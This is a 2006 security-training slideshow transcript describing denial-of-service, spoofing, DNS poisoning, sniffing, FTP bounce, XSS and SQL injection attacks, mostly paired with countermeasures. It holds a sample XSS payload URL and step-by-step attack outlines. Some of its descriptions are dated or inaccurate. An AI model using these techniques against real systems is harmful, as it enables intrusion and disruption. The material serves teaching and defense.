1 / 57

Network and Application Attacks

This guide provides a comprehensive overview of network and application attacks, including denial of service attacks, single source attacks, spoofing attacks, DNS attacks, and more. Written by Chandra Prakash Suryawanshi, a renowned expert in cybersecurity.

samuelf
Download Presentation

Network and Application Attacks

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006

  2. Contents • Denial of Service Attacks • Single Source • Distributed • Fragmentation Attacks • Spoofing Attacks • DNS Attacks • Sniffing Attacks • FTP Bounce Attack • Application Attacks

  3. Single Source Denial of Service Attacks

  4. Denial of Service Attacks • TCP SYN Flooding (SYN Attack) • ICMP_Echo Flooding (Ping Attack) • ICMP_Echo Flooding (Smurf Attack) • UDP_Echo Flooding (Fraggle) • ICMP_ECHO Reply Flooding (Ping of Death) • Distributed Denial Of Service • Trinoo • Tribe Flood Network (TFN)

  5. SYN Attack

  6. SERVER CLIENT Segment 1 SYN=1 ACK=0 141521 win 4096 <mss 1024> TCP CONNECTION SYN = 1 ACK = 1 181521 141522 win 4096<mss 1024> THREE-WAY CONNECTION Segment 2 Segment 3 SYN = 0 ACK = 1 181522 THREE-WAY CONNECTION • Segment 1 shows the client sending a SYN segment with an Initial Sequence Number of 141521. The ISN is randomly generated. This is called an Active Open. The fieldwin 4096 shows theadvertised window size of the sending station while the field<mss 1024> shows the receivingmaximum segment sizespecified by the sender. SYN=1, ACK=0. • Segment 2 shows the server responding with a SYN segment of 181521 and ACKnowledging the clients ISN with ISN + 1. This is called a Passive Open. SYN=1,ACK=1 • Segment 3 shows the client responding by ACKnowledging the servers ISN with ISN + 1. SYN=0,ACK=1. • Data can now be transmitted.

  7. TCP SYN Flooding SYN=1 ACK=0 141521 win 4096 (unreachable address Hacker Attack Method. • Most hosts will only support 8-16 simultaneous communication channels. • The Hacker sends a sequence of SYN packets. • Each SYN packet (about 120 /second) has a different and unreachable IP address. • This consumes all the communication channels and results in a denial to any TCP based service. Countermeasure. • Expand the number of ports, reduce the time-out period, validate TCP request packets. SYN=1 ACK=0 141686 win 4096 (unreachable address) SYN=1 ACK=0 141721 win 4096 (unreachable address) SYN = 1 ACK = 1 181521 141522 win 4096(unreachable address) Target Host Unreachable IP Address SYN = 1 ACK =1 181521 141687 win 4096(unreachable address) SYN = 1 ACK = 1 181521 141723 win 4096(unreachable address) Legitimate Client is denied access Legitimate Client

  8. PING Attack

  9. ICMP ECHO Flooding Ping Attack • The Hacker sends an ICMP Echo request to the target expecting an ICMP echo reply to be returned for each request. • The hacker, because of the high bandwidth, can send more requests then the target can handle. Countermeasures • No known defense Packet 4 Packet 2 INTERNET Packet 5 Packet 1 Packet n Packet 3 Packet n Target Hacker 128K Link T-1 Link

  10. SMURF Attack

  11. ICMP ECHO Flooding Packet 5 Packet n INTERNET SMURF Attack • The Hacker sends an ICMP Echo request to the target network with a destination broadcast address and a spoofed source address of the target. • The network serves as a "bounce site" and returns an Echo Reply for each station on the network. • The network serves to multiply the effect of the "ping". The Echo Request could be sent to multiple networks. Countermeasures • Disable IP-directed broadcasts at your router. • Configure the workstation to not respond to an IP broadcast packet. Target Hacker Echo Reply Echo Reply Echo Reply Echo Reply Echo Request

  12. DoS LAND attack • In LAND attack a crafted SYN packet is send in which a source IP address and Port no is same as of destination IP and port causing some implementations of TCP/IP to allocate excessive resources and slow down and eventually reboot or hang.

  13. Ping O' Death Attack

  14. ICMP ECHO Request Attack Ping o' Death Attack • ICMP, an integral part of IP, is utilized to report network errors. • PING (Packet InterNet Grouper) utilizes ICMP Echo and Reply packets to test host reachability. • ICMP messages normally consist of the IP Header and enclosed ICMP data with a default size of 64 bytes. • If the Hacker sends an ICMP Echo request that is greater than 65,536 this can crash or reboot the system. • A newer attack method modifies the header to indicate that thereis more data in the packet than there actually is. Countermeasure • Router updates that check the size of the ICMP packet. • Block PING (ICMP) traffic at the Firewall. INTERNET Packet > 65,536 Packet > 65,536 Target Hacker 128K Link T-1 Link

  15. Other • DOS Attacks

  16. Other DOS Attacks • Papasmurf: A combination of Smurf and Fraggle. • Land: A spoofed packet where: • Source IP = Destination IP • Source Port = Destination Port • Latierra: A Land relative that sends multiple land packets to multiple ports. • Jolt2: A stream of packet fragments none of which have an offset of zero. • Winnuke: Sends out of band packets to port 139 on the victims machine.

  17. Distributed Denial of Service Attacks - DDoS -

  18. General • DOS is designed to bring down a network or a computer by overloading it with large amounts of network traffic using TCP, UDP or ICMP. • Past attacks have been from asingle source and were relatively easy to detect. • Current attacks now use distributed system tools such as Trinoo and TFN • Distributed DOS tools launch simultaneous attacks from multiple computer systems at individual or multiple targets. • Almost impossible to track to the source.

  19. Common DDoS Types • Trinoo/WinTrinoo • The earliest DDoS. • Initiates a UDP flood attack. • Communicates between Master and Agents with unencrypted TCP/UDP. • Root access is not needed to launch the attack. • Tribal Flood Network (TFN)/TFN2K) • Employs Smurf, UDP, ICMP and TCP SYN floods. • Communicates between Master and Agents with ICMP_ECHO REPLY packets. • Commands are sent as part of the ICMP ID field. • The Agent is silent and does not reply to the Master. The Master sends multiple commands to the agent. • Agent host root or Administrator privileges are required.

  20. Teardrop Attack • Fragment Overflow Attack Fragmentation Attack

  21. TearDrop Attack

  22. Teardrop Attack • Teardrop attack involves sending two IP fragments, the later contained entirely in the former, causing the server to allocate too much of memory and crash. • Many Implementations of TCP/IP cannot handle this behavior.

  23. 0 15 16 31 HLEN Total Length TOS VERS 4 bits 4 bits 8 bits 16 bits Fragment Offset Identification Flags Teardrop Attack 13 bits 16 bits 3 bits TTL Protocol Checksum 17 8 bits 16 bits IP Header Source IP Address 32 bits Destination IP Address 32 bits IP Options(if any) 32 bits UDP Source Port UDP Destination Port 53 53 UDP Message Length UDP Checksum UDP Header Data . . . ETHERNET FIELD TYPE DESTINATION ADDRESS IP HEADER UDP HEADER SOURCE ADDRESS PREAMBLE FCS DATA 0-65535 2 4 8 6 6

  24. 0 15 16 31 Total Length HLEN TOS VERS 16 bits 4 bits 4 bits 8 bits Flags Fragment Offset Identification TTL Protocol Checksum 20 bytes 8 bits 16 bits 8 bits 60 bytes Source IP Address 32 bits Destination IP Address 32 bits Teardrop Attack IP Options(if any) <= 40 bytes 32 bits Target IP Datagram Data Hacker 32 bits MTU = 1500 MTU = 512 MTU = 1500 0 Rec Fragment 1 2 Fragment 1 TL 512 ID 26313 DF 0 MF 1 OS 0 Rec Fragment 2 32 bytes 512 bytes Teardrop Attack Concept Fragment 2 TL 32 ID 26313 DF 0 MF 0 OS 1 • This attack takes advantage of a bug in the IP fragmentation reassembly code. The code checks for the fragment length that is too large but not for a fragment length that is too short. The attack is directed toward NT, WIN 95 and Linux boxes • Encapsulate a UDP packet inside an IP packet. • Spoof the source IP address and Port • Create two specially constructed IP fragments The first packet has the OS = 0, MF = 1 and a size of N. The second packet has the OS < N, MF = 0 and a size < N. • NT/WIN 95 can normally withstand 5-10 pair attacks before it crashes or reboots. • Fixes have been posted by Microsoft.

  25. Fragmentation Overflow Attack

  26. Total Length HLEN TOS VERS 4 bits 4 bits 8 bits 16 bits Flags Fragment Offset Identification D M 0 13 bits 16 bits Fragment Overflow Attack F F TTL Protocol Checksum 8 bits 16 bits 8 bits Source IP Address 32 bits Destination IP Address 32 bits IP Options(if any) (<= 40 bytes) IP Datagram Data Attack Method • The IP Data Length field is 16 bits so each datagram can have a maximum size of 65515. • Intermediate routers can fragment the datagram based upon the MTU of the next network. • The MF flag set to 0 indicates the last packet. • If the receiving station does not receive a last packet it keeps allocating buffer space until an overflow occurs and the system crashes. Countermeasures • No known defense

  27. Spoofing Attacks

  28. Spoofing Attacks • IP Spoof. • TCP Sequence Attack. • ARP Spoof. • ICMP Spoof. • RIP Spoof.

  29. The IP attack is really a trust-relationship exploitation. A trusted relationship only requires IP address based authentication. • The attack is composed of several components. • Identify a host target. • Identify a host with a trusted relationship with the target. • Execute a Denial of Service attack against the trusted host(eg.A TCP SYN Attack). • Sample and guess the TCP sequence number of the target. • Impersonate the trusted host and attempt a connection that only requires address based authentication. IP Spoof Attack

  30. IP SPOOFING 2. Screening Router is fooled into believing that this packet is coming from an internal address. packet REALLY comes from hacker Screening Router Internet NET: 181.10.10.0 181.10.10.2 1. Hacker assumes source address181.10.13.1 in order to fool the screening Router by appearing to reside on the internal network ( a trusted host). 181.10.10.3 Target NET: 181.10.13.0 packet APPEARS to come from 181.10.13.1 From:181.10.13.1 To: 181.10.10.2 181.10.13.1 Countermeasure This attack can be defeated byfiltering on both the input and output ports of the Firewall. Hacker

  31. DNS Attacks

  32. DNS Attacks • DNS Cache Poisoning

  33. Internet DNS Attacks Host.Target.Com DNS.Server.Com Background 1.The DNS Server: • Translates hostnames into IP addresses. • Translates IP addresses into hostnames. • Provides host information, etc. 2. There are three main categories of DNS servers: • primary: There is only one primary server for each domain. All domain data is derived from this server. • It is loaded by the Domain Administrator. The primary server is authoritative. • secondary: There can be more than one secondary server per domain. It acts as a backup to the primary. • The domain database is transferred, zone file transfer, from the primary to the secondary on a scheduled basis. • cache-only: These servers acquire their information from other name servers. It then caches the information. These servers are non-authoritative. DNS.Bad.Com Hacker.Bad.Com

  34. Internet Possible Attacks. • Poison the DNS cache. • Poison the Name Server. • Imitate the Name Server. DNS Attacks Host.Target.Com DNS.Server.Com Background Contd 3. DNS server does this by maintaining the following files: • named.hosts: The zone file that maps host names into IP addresses. • named.rev: The reverse main zone file that maps IP addresses into host names. • named.ca: Addresses pointing to the root domain servers. • named.local: The loop back address - 127.0.0.1. • named.boot:: Contains the named parameters and points to the source of the domain data base information. 4. The local DNS server maintains a cache of its most recent queries. • It examines this cache first to see if it already knows the answers. • If not it forwards the query to other DNS servers for an answer. • Upon receiving the answer it updates its DNS cache and forwards the response to the client. DNS.Bad.Com Hacker.Bad.Com

  35. (1) What is the IP address of Unknown.Bad.Com? (3) What is the IP address of www.anyone.com? (4) The IP address of www.anyone.com is 127.0.0.1! Attack 1: DNS Cache Poisoning (2) What is the IP address of www.anyone.com? Internet Host.Target.Com DNS.Server.Com The Seed DNS.Bad.Com 1. The hacker.bad.com sends a recursive query to DNS.server.com requesting the IP address of unknown.bad.com. Hacker.Bad.Com 2. DNS.server.com is not authoritative for this domain so it queries DNS.bad.com. • The Hacker is monitoring this query to determine the recursive query ID. • The Hacker needs this ID to fool the DNS server into taking the poison. 3. Hacker.bad.com submits a query to DNS.server.com looking for the address of www.anyone.com. 4. The hacker immediately spoofs the reply with a response of www.anyone.com = 127.0.0.1. • This seeds the DNS server . • The IP address could be any address specified by the Hacker.

  36. What is the IP address of www.anyone.com? Attack 1: DNS Cache Poisoning The IP address of www.anyone.com is 127.0.0.1! Internet Host.Target.Com DNS.Server.Com DNS.Bad.Com Hacker.Bad.Com The Spoof 1. Target.good.com sends a query to DNS.server.com wanting to connect to www.anyone.com. 2. DNS.server.com responds with the address in the poisoned cache.

  37. Sniffer Attack

  38. Sniffer Attack B Host A Concept • Ethernet operates in a broadcast mode. Each station looks for its physical address. • The Hacker can operate a Sniffer on the Ethernet LAN in the promiscuous mode to look for: • Unencrypted passwords • Encrypted passwords • Private data • Financial information(account numbers) • Low level protocol information • A Sniffer attack is normally a prelude to other type attacks. Action Hacker • Host A Telnets to Host B with its User Name and Password. • Hacker steals password for later use. B Countermeasures Host B • Segment the LANs. • Encrypt the passwords w/ a timestamp. • Zero-knowledge authentication (card, ring ,etc)

  39. FTP Bounce Attack

  40. FTP CONNECTION EXAMPLE FTP Client FTP Server Normal FTP Connection 1. The Client opens a FTP command channel to server (Port 21) and tells the server its data port number (Port 4141). 2. The server acknowledges the request. 3. The server opens the data channel (Port 20) to the clients data channel (Port 4141). 4. The client acknowledges this connection. The Attack Concept. 1. The PORT command has the form n1,n2,n3,n4,n5,n6. 2. The client IP address(n1.n2.n3.n4) and port(n5 x 256+n6) Port 4140 Port 4141 Port 21 Port 20 Port (IP Address, 4141) :"OK" Data Channel :"OK"

  41. FTP CONNECTION EXAMPLE Contd FTP Client FTP Server Normal FTP Connection • The Client opens a FTP command channel to server (Port 21) and tells the server its data port number (Port 4141). • The server acknowledges the request. • The server opens the data channel (Port 20) to the clients data channel (Port 4141). • The client acknowledges this connection. Port 21 Port 4141 Port 4140 Port 20 "Port 4141" :"OK" Data Channel :"OK" Passive FTP Connection • The Client opens a FTP command channel to server (Port 21) in a passive mode. • The server acknowledges the passive mode and allocates Port 2266 to be the clients data channel. • The client opens the data channel from it data channel (Port 4141 to the servers data channel (Port 2266). • The server acknowledges the data connection. Port 2266 :"PASV" :"OK 2266" Data Channel :"OK"

  42. The Hacker can open an ftp passive mode on her server. • A world writable directory is available to the incoming ftp connection. FTP Bounce Attack Concept Hacker Server Bounce Server The Hacker • The Hacker cannot access the Target server. • The hacker can perform the ftp passive mode on her machine. Target Server • The Target Server will allow a connection from the Bounce Server.

  43. The Hacker opens an ftp connection to her server. • She changes to a writable directory and issues an: • ftp "pasv" command and an • ftp "stor" command • She remembers the IP address and port(H,H,H,H,P,P) returned by the "pasv" command. • She constructs a file called "retrvit" containing a series of ftp commands that will: • Sign onto the Target Server. • Change the directory to the desired file. • Use the FTP Port command to specify the IP address and port(H,H,H,H,P,P) of the Hacker Server. FTP Bounce Attack - Phase 1 Hacker Server The Hacker

  44. She opens an ftp command connection to the Bounce Server, logs in anonymously and changes to a world writable incoming directory. FTP Bounce Attack - Phase 2 • She then: • Transfer the file "retrevit" to the Bounce Server, • Opens a port to the target and • issues the command "retrevit" Hacker Server Bounce Server • This series of commands opens a port to the target server and executes the ftp commands contained in the "retrivit" command. • The commands contained within "retrevit" specifies that a : • connection should be established to the IP address and port (H,H,H,H,P,P) of the Hacker Server and that • the desired fields should be downloaded to the Hacker Server. The Hacker Target Server

  45. Web Attacks • Cross Side Scripting • SQL Injection • Directory transversal • Command Injection • Malicious Code Execution

  46. Cross Side Scripting • Cross-site scripting attacks place malicious code in locations where other users see it. The intention of the attack is to steal cookies that contain user identities and credentials, or to trick users into supplying their credentials to the attacker. • Many web sites use cookies to store information about users. Cookies contain identifying information such as username and password. A hacker may want to steal cookies in order to illegally use someone else's identity. • When someone browses to a web site to view a page, they send to the web server an HTTP request that contains their cookie. The web server usually keeps cookies for only a short time.

  47. XSS • Many web sites contain forms, which are used to post information such as names and addresses, or comments on bulletin boards. The hacker can inject scripting code into the vulnerable web server using the forms. • Scripting code includes tags such as <SCRIPT>. The code can instruct the server to send its cookies to another location, such as another web site (hence the name: Cross Site Scripting), where the hacker can see the cookies. These cookies might contain the login credentials

  48. XSS • Another variety of Cross-site scripting attack does not steal cookies, but rather dupes the victim into supplying his or her credentials. The attacker enters scripting code to a form. When a user accesses that form, the script causes a popup form to appear that asks the victim to supply his or her details. The form sends those details to the attacker. • Instead of targeting holes in your server's operating system or web server software, the attack works directly against the users of your site. It does this by tricking a user into submitting web scripting code (JavaScript, Jscript, etc.) to a dynamic form on the targeted web site. If the web site does not check for this scripting code it may pass it verbatim back to the user's browser where it can cause all kinds of damage

  49. XSS • Consider the following URL: http://www.example.com/search.pl?text=<script>alert(document.cookie)</script> • If an attacker can get us to select a link like this and the Web application does not validate input, then our browser will pop up an alert showing our current set of cookies. This particular example is harmless; an attacker can do much more damage, including stealing passwords, resetting your home page, or redirecting you to another Web site.

  50. SQL Injection • In SQL injection attack the attacker can Execute commands thru forms or as a URL. • With SQL, the CGI inserts the input data into a string which is then submitted to an SQL server. The attack is to add characters to the input so that extra SQL commands are performed or so the action is done on more database entries than expected. • Example- a web address www.example.com/article.asp/id=2it has a file, parameter and value fields.

More Related